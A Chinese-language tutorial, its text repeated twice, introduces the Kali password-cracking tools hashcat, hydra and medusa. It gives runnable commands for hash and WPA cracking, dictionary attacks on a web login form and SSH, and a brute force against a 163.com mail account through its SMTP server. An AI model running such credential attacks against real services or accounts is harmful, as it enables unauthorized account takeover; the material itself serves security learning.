密码破解，我们在前面的文章中讲到过很多次。本文将我们最常用的几款工具在进行简单的复述。希望对你的学习有所帮助。

hashcat

Hashcat是什么呢？Hashcat是当前最强大的开源密码恢复工具，你可以访问Hashcat.net网站来了解这款工具的详细情况。本质上，Hashcat 3.0是一款高级密码恢复工具，可以利用CPU或GPU资源来攻击160多种哈希类型的密码

示例：

hashcat -m 0 hash.txt /usr/share/wordlist/pass.txt

• -m后面跟hash类型

• hash.txt里存要破解的hash

• pass.txt是kali linux中自带的字典,也可以是你的字典。当然没有字典我们可以枚举破解。

如8位数的从数字密码。

hashcat -a 3  -m 2500 777.hccapx ?d?d?d?d?d?d?d?d --force

hydra

hydra（thc hydra）是一个在线密码攻击工具。它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。示例破解网站登录

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^password=^PASS^:Invalid" -t 64

• -l代表输入的^USER^值，可以是字典，我们这里指定是admin

• -P代表输入的^PASS^值，这里选择rockyou.txt字典

• 10.10.10.43是目标服务器的IP

• http-post-form为请求方法POST 破解邮箱密码（需开启smtp服务）

hydra -s 465 -S -v -V -l xxxx@163.com -P /root/zi.txt -t 16 smtp.163.com smtp

• -s 端口号 之前默认为25 现在基本启用了,改为了支持ssl协议的465`

• -v 显示详细过程

• -l 邮箱账号

• -P 字典路劲

• -t 破解线程

mesuda

mesuda也是我们常用的破解工具之一，支持的协议也比较多。如破解ssh密码

medusa -h 10.10.10.171 -U user.txt -P passwords.txt -M ssh 10.10.10.171

总结

以上便是在kali中常用到的几款密码破解工具，无论是那个工具都是依赖于字典和枚举破解两种形式。前者能否成功在于你的字典，后者能否成功在于你的计算机性能。

密码破解，我们在前面的文章中讲到过很多次。本文将我们最常用的几款工具在进行简单的复述。希望对你的学习有所帮助。

hashcat

Hashcat是什么呢？Hashcat是当前最强大的开源密码恢复工具，你可以访问Hashcat.net网站来了解这款工具的详细情况。本质上，Hashcat 3.0是一款高级密码恢复工具，可以利用CPU或GPU资源来攻击160多种哈希类型的密码

示例：

hashcat -m 0 hash.txt /usr/share/wordlist/pass.txt

• -m后面跟hash类型

• hash.txt里存要破解的hash

• pass.txt是kali linux中自带的字典,也可以是你的字典。当然没有字典我们可以枚举破解。

编辑切换为居中

如8位数的从数字密码。

hashcat -a 3  -m 2500 777.hccapx ?d?d?d?d?d?d?d?d --force

编辑

hydra

hydra（thc hydra）是一个在线密码攻击工具。它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。示例破解网站登录

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^password=^PASS^:Invalid" -t 64

• -l代表输入的^USER^值，可以是字典，我们这里指定是admin

• -P代表输入的^PASS^值，这里选择rockyou.txt字典

• 10.10.10.43是目标服务器的IP

• http-post-form为请求方法POST 破解邮箱密码（需开启smtp服务）

hydra -s 465 -S -v -V -l xxxx@163.com -P /root/zi.txt -t 16 smtp.163.com smtp

• -s 端口号 之前默认为25 现在基本启用了,改为了支持ssl协议的465`

• -v 显示详细过程

• -l 邮箱账号

• -P 字典路劲

• -t 破解线程

mesuda

mesuda也是我们常用的破解工具之一，支持的协议也比较多。如破解ssh密码

medusa -h 10.10.10.171 -U user.txt -P passwords.txt -M ssh 10.10.10.171

总结

以上便是在kali中常用到的几款密码破解工具，无论是那个工具都是依赖于字典和枚举破解两种形式。前者能否成功在于你的字典，后者能否成功在于你的计算机性能。

【密码破解学习资料与工具下载】